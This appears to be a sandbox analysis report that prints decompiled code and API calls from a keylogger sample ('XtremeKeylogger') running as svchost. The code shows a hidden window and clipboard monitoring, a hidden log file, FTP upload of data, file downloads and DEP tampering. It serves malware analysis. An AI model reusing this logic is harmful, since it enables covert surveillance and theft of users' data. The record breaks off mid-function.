CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00C87571
WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000), ref: 00C87592

Part of subcall function 00C85084: WriteFile.KERNEL32(00000000,?,00000002,?,?), ref: 00C850AA

VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,00000000,000000FF,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000000), ref: 00C875BB
CloseHandle.KERNEL32(00000000), ref: 00C875C1

Part of subcall function 00C87918: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C87933
Part of subcall function 00C87918: InternetConnectW.WININET(00000000,?,00000015,?,?,00000001,08000000,00000000), ref: 00C8794F
Part of subcall function 00C87918: FtpSetCurrentDirectoryW.WININET(00000000,?), ref: 00C8795B
Part of subcall function 00C87918: WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 00C8796C
Part of subcall function 00C87918: FtpPutFileW.WININET(00000000,?,00000000,00000002,00000000), ref: 00C8797E
Part of subcall function 00C87918: InternetCloseHandle.WININET(00000000), ref: 00C8798A
Part of subcall function 00C87918: InternetCloseHandle.WININET(00000000), ref: 00C87990

DeleteFileW.KERNEL32(?,?,?,?,00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,00000000), ref: 00C87602

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C83280, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 120

C-Code - Quality: 96%

			E00C83280(WCHAR* __eax, intOrPtr* __edx) {
				short _t8;
				short _t9;
				WCHAR* _t10;
				short _t12;
				WCHAR* _t14;
				short _t16;
				WCHAR* _t17;
				short _t19;
				WCHAR* _t21;
				WCHAR* _t24;
				WCHAR* _t25;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				signed int _t34;
				intOrPtr* _t35;
				intOrPtr _t36;
				long _t37;
				signed int _t38;
				WCHAR* _t39;

				_t35 = __edx;
				_t24 = __eax;
				 *__edx = 0;
				while(1) {
					L2:
					_t8 =  *_t24;
					if(_t8 != 0 && _t8 <= 0x20) {
						_t24 = CharNextW(_t24);
					}
					L2:
					_t8 =  *_t24;
					if(_t8 != 0 && _t8 <= 0x20) {
						_t24 = CharNextW(_t24);
					}
					L4:
					if( *_t24 != 0x22 || _t24[1] != 0x22) {
						_t37 = 0;
						_t39 = _t24;
						while(1) {
							_t9 =  *_t24;
							if(_t9 <= 0x20) {
								break;
							}
							if(_t9 != 0x22) {
								_t10 = CharNextW(_t24);
								_t28 = _t10 - _t24;
								_t29 = _t28 >> 1;
								if(_t28 < 0) {
									asm("adc edx, 0x0");
								}
								_t37 = _t37 + _t29;
								_t24 = _t10;
								continue;
							}
							_t24 = CharNextW(_t24);
							while(1) {
								_t12 =  *_t24;
								if(_t12 == 0 || _t12 == 0x22) {
									break;
								}
								_t14 = CharNextW(_t24);
								_t33 = _t14 - _t24;
								_t34 = _t33 >> 1;
								if(_t33 < 0) {
									asm("adc edx, 0x0");
								}
								_t37 = _t37 + _t34;
								_t24 = _t14;
							}
							if( *_t24 != 0) {
								_t24 = CharNextW(_t24);
							}
						}
						 *_t35 = VirtualAlloc(0, _t37, 0x1000, 4);
						_t25 = _t39;
						_t36 =  *_t35;
						_t38 = 0;
						while(1) {
							_t16 =  *_t25;
							if(_t16 <= 0x20) {
								break;
							}
							if(_t16 != 0x22) {
								_t17 = CharNextW(_t25);
								if(_t17 <= _t25) {
									continue;
								} else {
									goto L31;
								}
								do {
									L31:
									 *((short*)(_t36 + _t38 * 2)) =  *_t25;
									_t25 =  &(_t25[1]);
									_t38 = _t38 + 1;
								} while (_t17 > _t25);
								continue;
							}
							_t25 = CharNextW(_t25);
							while(1) {
								_t19 =  *_t25;
								if(_t19 == 0 || _t19 == 0x22) {
									break;
								}
								_t21 = CharNextW(_t25);
								if(_t21 <= _t25) {
									continue;
								} else {
									goto L25;
								}
								do {
									L25:
									 *((short*)(_t36 + _t38 * 2)) =  *_t25;
									_t25 =  &(_t25[1]);
									_t38 = _t38 + 1;
								} while (_t21 > _t25);
							}
							if( *_t25 != 0) {
								_t25 = CharNextW(_t25);
							}
						}
						return _t25;
					} else {
						_t24 =  &(_t24[2]);
						continue;
					}
				}
			}

APIs

CharNextW.USER32(00000000), ref: 00C8328F
CharNextW.USER32(00000000), ref: 00C832C3
CharNextW.USER32(00000000), ref: 00C832CD
CharNextW.USER32(00000000), ref: 00C832F6
CharNextW.USER32(00000000), ref: 00C83300
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,?,?,00000000,00000001,00C8347B,00000000,00C83498), ref: 00C83327
CharNextW.USER32(00000000), ref: 00C8333D
CharNextW.USER32(00000000), ref: 00C83347
CharNextW.USER32(00000000), ref: 00C83374
CharNextW.USER32(00000000), ref: 00C8337E

Strings

", xrefs: 00C832A4
", xrefs: 00C832AA

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C879DA, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 35
registryclipboard

C-Code - Quality: 60%

			E00C879DA() {
				intOrPtr _t11;
				intOrPtr _t14;

				_push(_t14);
				_push(0xc87a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t14;
				 *0xc8dee4 =  *0xc8dee4 - 1;
				if( *0xc8dee4 < 0) {
					 *0xc8decc = RegisterClipboardFormatW(L"jiejwogfdjieovevodnvfnievn");
					 *0xc8ded0 = RegisterClipboardFormatW(L"trhgtehgfsgrfgtrwegtre");
					 *0xc8ded4 = RegisterClipboardFormatW(L"jytjyegrsfvfbgfsdf");
					 *0xc8ded8 = RegisterClipboardFormatW(L"hgtrfsgfrsgfgregtregtr");
					 *0xc8dedc = RegisterClipboardFormatW(L"frgjbfdkbnfsdjbvofsjfrfre");
					 *0xc8dee0 = RegisterClipboardFormatW(L"frgkmjgtmklgtlrglt");
				}
				_pop(_t11);
				 *[fs:eax] = _t11;
				_push(E00C87A65);
				return 0;
			}

0x00c879e1
0x00c879e2
0x00c879e7
0x00c879ea
0x00c879ed
0x00c879f4
0x00c87a00
0x00c87a0f
0x00c87a1e
0x00c87a2d
0x00c87a3c
0x00c87a4b
0x00c87a4b
0x00c87a52
0x00c87a55
0x00c87a58
0x00000000

APIs

RegisterClipboardFormatW.USER32(jiejwogfdjieovevodnvfnievn), ref: 00C879FB
RegisterClipboardFormatW.USER32(trhgtehgfsgrfgtrwegtre), ref: 00C87A0A
RegisterClipboardFormatW.USER32(jytjyegrsfvfbgfsdf), ref: 00C87A19
RegisterClipboardFormatW.USER32(hgtrfsgfrsgfgregtregtr), ref: 00C87A28
RegisterClipboardFormatW.USER32(frgjbfdkbnfsdjbvofsjfrfre), ref: 00C87A37
RegisterClipboardFormatW.USER32(frgkmjgtmklgtlrglt), ref: 00C87A46

Strings

jytjyegrsfvfbgfsdf, xrefs: 00C87A14
frgjbfdkbnfsdjbvofsjfrfre, xrefs: 00C87A32
trhgtehgfsgrfgtrwegtre, xrefs: 00C87A05
jiejwogfdjieovevodnvfnievn, xrefs: 00C879F6
hgtrfsgfrsgfgregtregtr, xrefs: 00C87A23
frgkmjgtmklgtlrglt, xrefs: 00C87A41

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C879DC, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34
registryclipboard

C-Code - Quality: 60%

			E00C879DC() {
				intOrPtr _t11;
				intOrPtr _t14;

				_push(_t14);
				_push(0xc87a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t14;
				 *0xc8dee4 =  *0xc8dee4 - 1;
				if( *0xc8dee4 < 0) {
					 *0xc8decc = RegisterClipboardFormatW(L"jiejwogfdjieovevodnvfnievn");
					 *0xc8ded0 = RegisterClipboardFormatW(L"trhgtehgfsgrfgtrwegtre");
					 *0xc8ded4 = RegisterClipboardFormatW(L"jytjyegrsfvfbgfsdf");
					 *0xc8ded8 = RegisterClipboardFormatW(L"hgtrfsgfrsgfgregtregtr");
					 *0xc8dedc = RegisterClipboardFormatW(L"frgjbfdkbnfsdjbvofsjfrfre");
					 *0xc8dee0 = RegisterClipboardFormatW(L"frgkmjgtmklgtlrglt");
				}
				_pop(_t11);
				 *[fs:eax] = _t11;
				_push(E00C87A65);
				return 0;
			}

0x00c879e1
0x00c879e2
0x00c879e7
0x00c879ea
0x00c879ed
0x00c879f4
0x00c87a00
0x00c87a0f
0x00c87a1e
0x00c87a2d
0x00c87a3c
0x00c87a4b
0x00c87a4b
0x00c87a52
0x00c87a55
0x00c87a58
0x00000000

APIs

RegisterClipboardFormatW.USER32(jiejwogfdjieovevodnvfnievn), ref: 00C879FB
RegisterClipboardFormatW.USER32(trhgtehgfsgrfgtrwegtre), ref: 00C87A0A
RegisterClipboardFormatW.USER32(jytjyegrsfvfbgfsdf), ref: 00C87A19
RegisterClipboardFormatW.USER32(hgtrfsgfrsgfgregtregtr), ref: 00C87A28
RegisterClipboardFormatW.USER32(frgjbfdkbnfsdjbvofsjfrfre), ref: 00C87A37
RegisterClipboardFormatW.USER32(frgkmjgtmklgtlrglt), ref: 00C87A46

Strings

jytjyegrsfvfbgfsdf, xrefs: 00C87A14
frgjbfdkbnfsdjbvofsjfrfre, xrefs: 00C87A32
trhgtehgfsgrfgtrwegtre, xrefs: 00C87A05
jiejwogfdjieovevodnvfnievn, xrefs: 00C879F6
hgtrfsgfrsgfgregtregtr, xrefs: 00C87A23
frgkmjgtmklgtlrglt, xrefs: 00C87A41

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C898DC, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 79
librarywindow

C-Code - Quality: 100%

			E00C898DC(intOrPtr _a4) {
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				signed int _t20;
				signed int _t21;

				_t17 = _a4;
				LoadLibraryA("user32.dll");
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("shell32.dll");
				LoadLibraryA("shlwapi.dll");
				E00C888D0(0x80000001, L"SOFTWARE\\FakeMessage", 2, 4, 0, L"OK");
				_t12 =  *((intOrPtr*)(_t17 + 0x1554));
				if(_t12 != 0) {
					if(_t12 != 1) {
						if(_t12 != 2) {
							if(_t12 != 3) {
								if(_t12 != 4) {
									if(_t12 == 5) {
										_t21 = 2;
									}
								} else {
									_t21 = 3;
								}
							} else {
								_t21 = 4;
							}
						} else {
							_t21 = 5;
						}
					} else {
						_t21 = 1;
					}
				} else {
					_t21 = 0;
				}
				_t13 =  *((intOrPtr*)(_t17 + 0x1550));
				if(_t13 != 0) {
					if(_t13 != 1) {
						if(_t13 != 2) {
							if(_t13 != 3) {
								if(_t13 == 4) {
									_t20 = 0;
								}
							} else {
								_t20 = 0x40;
							}
						} else {
							_t20 = 0x30;
						}
					} else {
						_t20 = 0x10;
					}
				} else {
					_t20 = 0x20;
				}
				return MessageBoxW(0, _t17 + 0x156e, _t17 + 0x1558, _t21 | _t20);
			}

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00C898EA
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C898F4
LoadLibraryA.KERNEL32(shell32.dll), ref: 00C898FE
LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C89908

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

MessageBoxW.USER32(00000000,?,?,00000000), ref: 00C899C3

Strings

FakeMessage, xrefs: 00C89918
shlwapi.dll, xrefs: 00C89903
SOFTWARE\FakeMessage, xrefs: 00C8991D
shell32.dll, xrefs: 00C898F9
advapi32.dll, xrefs: 00C898EF
user32.dll, xrefs: 00C898E5

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C87B84, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 119
file

C-Code - Quality: 87%

			E00C87B84(void* __eax, void* __ebx, void* __esi) {
				long _v8;
				char _v12;
				WCHAR* _t12;
				WCHAR* _t14;
				WCHAR* _t19;
				WCHAR* _t21;
				long _t25;
				long _t29;
				void* _t30;
				struct _OVERLAPPED* _t32;
				void* _t37;
				WCHAR* _t41;
				WCHAR* _t46;
				intOrPtr _t48;
				intOrPtr _t57;
				struct _OVERLAPPED* _t59;
				void* _t61;
				WCHAR* _t63;
				WCHAR* _t64;
				void* _t66;
				void* _t67;
				void* _t70;

				_v12 = 0;
				_t66 = __eax;
				_push(_t70);
				_push(0xc87d2a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70 + 0xfffffff8;
				 *0xc8e020 = 0;
				 *0xc8e024 = 0;
				 *0xc8e028 = 0;
				if( *0xc8e014 == 1) {
					_t46 =  *0xc8e01c; // 0x0
					if(E00C835B0(_t46) == 0) {
						_t64 =  *0xc8e01c; // 0x0
						_t48 =  *0xc8e018; // 0x0
						E00C837C0(_t48, _t64);
					}
				}
				_t12 =  *0xc8e01c; // 0x0
				if(E00C835B0(_t12) == 0) {
					_t63 =  *0xc8e01c; // 0x0
					E00C837C0(_t66, _t63);
				}
				_t14 =  *0xc8e01c; // 0x0
				if(E00C835B0(_t14) == 1) {
					_t19 =  *0xc8e01c; // 0x0
					SetFileAttributesW(_t19, 0x80);
					_t21 =  *0xc8e01c; // 0x0
					_t67 = CreateFileW(_t21, 0x80000000, 1, 0, 3, 0, 0);
					if(_t67 != 0xffffffff) {
						 *0xc8e024 = GetFileSize(_t67, 0);
						 *0xc8e028 = 0;
						_t25 =  *0xc8e024; // 0x0
						 *0xc8e020 = VirtualAlloc(0, _t25, 0x1000, 0x40);
						SetFilePointer(_t67, 0, 0, 0);
						_t29 =  *0xc8e024; // 0x0
						_t30 =  *0xc8e020; // 0x0
						ReadFile(_t67, _t30, _t29,  &_v8, 0);
						_t32 =  *0xc8e024; // 0x0
						_t59 =  *0xc8e028; // 0x0
						E00C81F6C( &_v12, E00C8214C(_t32, _t59, 2, 0));
						_t37 = E00C81CF4(_v12);
						_t61 =  *0xc8e020; // 0x0
						E00C82914(_t37, _t61);
						if((0 | E00C81F1C(L"ENDSERVERBUFFER", _v12) > 0x00000000) == 0) {
							_t41 =  *0xc8e01c; // 0x0
							DeleteFileW(_t41);
							 *0xc8e020 = 0;
							 *0xc8e024 = 0;
							 *0xc8e028 = 0;
						}
					}
					CloseHandle(_t67);
				}
				_pop(_t57);
				 *[fs:eax] = _t57;
				_push(E00C87D31);
				return E00C81B78( &_v12);
			}

APIs

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000), ref: 00C87C6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001), ref: 00C87CEE
CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

Part of subcall function 00C837C0: DeleteUrlCacheEntryW.WININET(local), ref: 00C837C7
Part of subcall function 00C837C0: DeleteFileW.KERNEL32(00000000,local,00000000,00C87C00,00000000,00C87D2A,?,00000000,00000000), ref: 00C837CD
Part of subcall function 00C837C0: URLDownloadToFileW.URLMON(00000000,local,00000000,00000000,00000000), ref: 00C837DA

Strings

ENDSERVERBUFFER, xrefs: 00C87CD5

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C87744, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108
windowclipboard

C-Code - Quality: 95%

			E00C87744(void* __esi, void* __ebp) {
				int _v8;
				long _v12;
				char _v16;
				char _v19;
				char _v20;
				void* __ebx;
				struct HWND__* _t11;
				WCHAR* _t13;
				WCHAR* _t15;
				struct HWND__* _t16;
				void* _t17;
				long _t18;
				WCHAR* _t19;
				void* _t21;
				int _t24;
				int _t26;
				struct HWND__* _t27;
				struct HWND__* _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t37;
				int _t42;
				int _t45;
				void* _t48;

				_t48 = __esi;
				E00C8684C();
				 *0xc8dff5 = 1;
				_t41 = L"XtremeKeylogger";
				if( *0xc8b0b4 <= 0) {
					 *0xc8b0b4 = E00C87348(L"XtremeKeylogger", E00C86948);
				}
				_t11 =  *0xc8b0b4; // 0x0
				ShowWindow(_t11, 0);
				_t13 =  *0xc8dec8; // 0x0
				SetFileAttributesW(_t13, 0x80);
				_t15 =  *0xc8dec8; // 0x0
				_t16 = CreateFileW(_t15, 0xc0000000, 3, 0, 4, 0, 0);
				 *0xc8dee8 = _t16;
				if( *0xc8dee8 != 0xffffffff) {
					_t17 =  *0xc8dee8; // 0x0
					_t18 = GetFileSize(_t17, 0);
					_t45 = 0;
					_v12 = _t18;
					_v8 = 0;
					if(_v8 != 0 || _v12 != 0) {
						 *0xc8dff4 = 0;
					} else {
						_v20 = 0xff;
						_v19 = 0xfe;
						_t45 =  &_v20;
						_t37 =  *0xc8dee8; // 0x0
						E00C85084(_t37, 2, _t45, 0,  &_v16);
						 *0xc8dff4 = 1;
					}
					_t19 =  *0xc8dec8; // 0x0
					SetFileAttributesW(_t19, 7);
					_t21 =  *0xc8dee8; // 0x0
					SetFilePointer(_t21, 0, 0, 2);
					_t42 = E00C852E8(_t41);
					_t24 = _t42;
					asm("cdq");
					if(_t45 != _v8) {
						if(__eflags <= 0) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						if(_t24 <= _v12) {
							L12:
							asm("cdq");
							 *0xc8b0c8 = _t42;
							 *0xc8b0cc = _t45;
						} else {
							L11:
							 *0xc8b0c8 = 0;
							 *0xc8b0cc = 0;
							E00C853EC(0, _t41, _t48);
						}
					}
					_t26 =  *0xc8ded4; // 0xc1f3
					_t27 =  *0xc8b0b4; // 0x0
					SendMessageA(_t27, _t26, 0, 0);
					_t29 =  *0xc8b0b4; // 0x0
					_t16 = SetClipboardViewer(_t29);
					if( *0xc8da4b == 1) {
						if( *0xc8dffc != 0) {
							_t32 =  *0xc8dffc; // 0x0
							E00C8387C(_t32);
						}
						_t31 = E00C8384C(E00C87614, 0, 0);
						 *0xc8dffc = _t31;
						return _t31;
					}
				}
				return _t16;
			}

APIs

Part of subcall function 00C8684C: SendMessageA.USER32(00000000,0000C1F2,00000000,00000000), ref: 00C86865
Part of subcall function 00C8684C: CloseHandle.KERNEL32(00000000), ref: 00C86879

ShowWindow.USER32(00000000,00000000), ref: 00C8777B
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C8778B
CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000004,00000000,00000000), ref: 00C877A5
GetFileSize.KERNEL32(00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080), ref: 00C877C4
SetFileAttributesW.KERNEL32(00000000,00000007,00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080), ref: 00C8781C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000007,00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000), ref: 00C8782D

Part of subcall function 00C852E8: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA,?,XtremeKeylogger), ref: 00C8534C
Part of subcall function 00C852E8: RegQueryValueExW.ADVAPI32(?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA), ref: 00C8537A
Part of subcall function 00C852E8: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000), ref: 00C8538A

SendMessageA.USER32(00000000,0000C1F3,00000000,00000000), ref: 00C87888
SetClipboardViewer.USER32(00000000), ref: 00C87893

Part of subcall function 00C8384C: CreateThread.KERNEL32(00000000,00000000,00C87D60,00000000,?,?), ref: 00C83862
Part of subcall function 00C8384C: SetThreadPriority.KERNEL32(00000000,00000000,00000001,?,00000000,?,00C88DB8,00000000), ref: 00C8386B

Part of subcall function 00C8387C: TerminateThread.KERNEL32(00000000,00000001,?,XtremeKeylogger,00C878B4,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000007,00000000), ref: 00C83883
Part of subcall function 00C8387C: CloseHandle.KERNEL32(00000000), ref: 00C8388F

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Part of subcall function 00C85084: WriteFile.KERNEL32(00000000,?,00000002,?,?), ref: 00C850AA

Part of subcall function 00C87348: GetDesktopWindow.USER32 ref: 00C87390
Part of subcall function 00C87348: GetWindowRect.USER32(00000000), ref: 00C87396
Part of subcall function 00C87348: GetModuleHandleA.KERNEL32(00000000), ref: 00C8739D
Part of subcall function 00C87348: RegisterClassW.USER32(?), ref: 00C873A5
Part of subcall function 00C87348: CreateWindowExW.USER32(00000080,XtremeKeylogger,00C873DC,98000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C873CF

Strings

XtremeKeylogger, xrefs: 00C87754

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C82994, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91
library

C-Code - Quality: 64%

			E00C82994(intOrPtr __eax) {
				signed int _v20;
				signed int _t15;
				signed int _t16;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t25;
				void* _t28;
				signed int _t32;
				signed int _t35;
				signed int _t36;
				signed int _t39;
				intOrPtr* _t40;
				struct HINSTANCE__* _t41;
				struct HINSTANCE__* _t42;
				signed int _t43;
				intOrPtr* _t44;
				void* _t45;
				intOrPtr* _t46;
				void* _t49;

				_t46 = _t45 + 0xfffffff8;
				 *_t46 = __eax;
				_t36 = 0;
				_t41 = GetModuleHandleA("Kernel32.dll");
				if(_t41 == 0xffffffff) {
					L10:
					__eflags = _t36 - 1;
					if(_t36 == 1) {
						L23:
						return _t36;
					}
					_t42 = GetModuleHandleA("ntdll.dll");
					__eflags = _t42 - 0xffffffff;
					if(_t42 == 0xffffffff) {
						goto L23;
					}
					_t43 = GetProcAddress(_t42, "NtSetInformationProcess");
					_t39 = _t43;
					__eflags = _t43;
					if(_t43 == 0) {
						goto L23;
					}
					_t15 =  *_t46 - 1;
					__eflags = _t15;
					if(__eflags < 0) {
						_t16 =  *0xc8b0a0; // 0x2
						_v20 = _t16;
						L20:
						_t19 =  *_t39(GetCurrentProcess(), 0x22,  &_v20, 4);
						__eflags = _t19;
						if(_t19 != 0) {
							_t36 = 0;
							__eflags = 0;
						} else {
							_t36 = 1;
						}
						goto L23;
					}
					if(__eflags == 0) {
						_t20 =  *0xc8b0a8; // 0x8
						_v20 = _t20 |  *0xc8b09c;
						goto L20;
					}
					__eflags = _t15 == 1;
					if(_t15 == 1) {
						_t23 =  *0xc8b0a8; // 0x8
						_t25 = _t23 |  *0xc8b09c |  *0xc8b0a4;
						__eflags = _t25;
						_v20 = _t25;
						goto L20;
					}
					goto L23;
				}
				_t44 = GetProcAddress(_t41, "SetProcessDEPPolicy");
				_t40 = _t44;
				if(_t44 == 0) {
					goto L10;
				}
				_t28 =  *_t46 - 1;
				_t49 = _t28;
				if(_t49 < 0) {
					_v20 = 0;
					L9:
					_t36 =  *_t40(_v20);
					goto L10;
				}
				if(_t49 == 0) {
					_t32 =  *0xc8b094; // 0x1
					_v20 = _t32 |  *0xc8b098;
					goto L9;
				}
				if(_t28 == 1) {
					_t35 =  *0xc8b094; // 0x1
					_v20 = _t35;
					goto L9;
				}
				goto L23;
			}

APIs

GetModuleHandleA.KERNEL32(Kernel32.dll), ref: 00C829A5
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy,Kernel32.dll), ref: 00C829B7
GetModuleHandleA.KERNEL32(ntdll.dll,Kernel32.dll), ref: 00C82A0B
GetProcAddress.KERNEL32(00000000,NtSetInformationProcess,ntdll.dll,Kernel32.dll), ref: 00C82A1D
GetCurrentProcess.KERNEL32(00000022,?,00000004,00000000,NtSetInformationProcess,ntdll.dll,Kernel32.dll), ref: 00C82A73

Strings

SetProcessDEPPolicy, xrefs: 00C829B1
NtSetInformationProcess, xrefs: 00C82A17
Kernel32.dll, xrefs: 00C829A0
ntdll.dll, xrefs: 00C82A06

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C840F8, Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 293

C-Code - Quality: 45%

			E00C840F8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v1308;
				void _v6188;
				char _v6740;
				char _v6744;
				char _v6748;
				char _v6752;
				char _v6756;
				char _v6760;
				char _v6764;
				char _v6768;
				char _v6772;
				char _v6776;
				char _v6780;
				char _v6784;
				char _v6788;
				char _v6792;
				char _v6796;
				char _v6800;
				char _v6804;
				char _v6808;
				char _t110;
				void* _t122;
				char _t130;
				void* _t203;
				char* _t206;
				void* _t207;
				void* _t223;
				void* _t225;
				void* _t227;
				void* _t229;
				intOrPtr _t237;
				char _t250;
				void* _t251;
				void* _t258;
				void* _t274;
				void* _t278;
				short* _t282;
				short* _t284;
				void* _t286;
				void* _t287;

				_t286 = _t287;
				_t207 = 0x352;
				goto L1;
				L4:
				E00C81DBC(_v8, 0);
				if(0 == 0) {
					L29:
					_pop(_t237);
					 *[fs:eax] = _t237;
					_push(E00C84541);
					E00C81B90( &_v6808, 0x11);
					return E00C81B90( &_v16, 3);
				} else {
					while(1) {
						E00C81DBC(_v8, 0);
						if(0 == 0) {
							goto L29;
						}
						E00C81B78( &_v16);
						E00C81B78( &_v12);
						E00C8291C();
						E00C82914(_t206, E00C81CF4(_v8));
						E00C81E8C( &_v8, 0x228, 1, __eflags);
						E00C81E40(_v8, E00C8214C( *((intOrPtr*)(_t206 + 0x210)),  *((intOrPtr*)(_t206 + 0x214)), 2, 0), 1, __eflags,  &_v16);
						E00C81E8C( &_v8, E00C8214C( *((intOrPtr*)(_t206 + 0x210)),  *((intOrPtr*)(_t206 + 0x214)), 2, 0), 1, __eflags);
